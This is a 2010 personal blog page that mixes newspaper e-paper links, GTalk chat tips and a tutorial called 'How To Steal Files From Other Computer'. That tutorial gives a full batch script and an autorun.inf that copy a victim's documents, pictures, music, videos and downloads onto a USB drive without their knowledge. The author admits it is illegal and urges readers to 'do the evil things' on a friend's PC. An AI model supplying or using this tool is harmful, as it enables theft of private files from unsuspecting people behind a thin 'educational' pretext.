studentrocks

MAY 13 E-PAPER BY EENADU

Thursday, May 13, 2010

CLICK THE IMAGES TO ENLARGE FOR EASY READING










Read more...

How To Steal Files From Other Computer

Wednesday, May 12, 2010

In today’s article I am going to teach you something illegal but only for educational propose. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or anyremovable storage media.

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and
Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=
Filename.bat
Action=File Copier

The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.

Read more...

HOW TO INCREASE utorrent DOWNLOAD SPEED

This summary is not available. Please click here to view the post.

Read more...

MAY 06 E-PAPER BY EENADU

Friday, May 7, 2010

CLICK THE IMAGES TO ENLARGE FOR EASY READING






Read more...

APRIL 29 E-PAPER BY EENADU

Monday, May 3, 2010

CLICK THE IMAGES TO ENLARGE FOR EASY READING










Read more...

APRIL 22 E-PAPER BY EENADU

Sunday, May 2, 2010

CLICK THE IMAGES TO ENLARGE FOR EASY READING





Read more...

GTalk chatting Tips and shortcuts

GTalk, my fav. messenger :D

Most of us chat a lot everyday, with friends, family members and many other. If I don’t chat for a day with at least not even with one person, I say the day was boring! :P

So here am I with some chat formatting tips & shortcuts that will help you to deal more efficiently with GTalk…

Text Formatting

  • Bold Text – Place the text between two asterisks. eg. *This text will be BOLD!*
  • Italic Text – Place the text between two underscores. eg. _This text will be ITALIC!_

GTalk Shortcuts

  • Esc – Close current chat window
  • Alt + Esc – Close all chat windows
  • F9 – Open Gmail
  • F11 – Call
  • F12 – End current Call
  • Tab – Switch through the currently open chat windows

Transliteration (Indic Languages)

Google Bots help you to transliterate English to some Indian Languages. Below is a list of bots, add them to your friend list and then send them any message and then they will respond you back with the transliterated message :)

Languages
Bots
English to Hindien2hi.translit@bot.talk.google.com
English to Kannadaen2kn.translit@bot.talk.google.com
English to Malayalamen2ml.translit@bot.talk.google.com
English to Tamilen2ta.translit@bot.talk.google.com
English to Teluguen2te.translit@bot.talk.google.com

GTalk Startup Parameters

There are some parameters that can be given to GTalk when it starts. It adds some extra functionality to GTalk.

To use the parameters, just edit the Google Talk shortcut on your desktop, and add any of the following parameters after a slash(/) or just run GTalk adding these parameters at the end followed by a slash(/).

  • nomutex – Open more than one instance of GTalk at a time
  • checkupdate – Check for updates to the current version
  • factoryreset – Load default settings
  • diag – Run GTalk in Diagnostic Mode
  • mailto user@gmail.com – Send an email using GMail

Read more...

  © DESIGN BY OBILLANENI OBILLANENI by OBILLANENI 2008

Back to TOP